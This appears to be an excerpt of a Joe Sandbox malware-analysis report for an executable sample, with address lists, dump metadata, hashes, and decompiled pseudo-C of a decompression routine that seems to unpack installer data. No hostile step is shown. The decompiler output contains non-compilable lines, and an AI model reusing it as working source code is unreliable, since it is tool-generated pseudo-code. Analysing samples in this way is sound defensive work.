0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407002

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
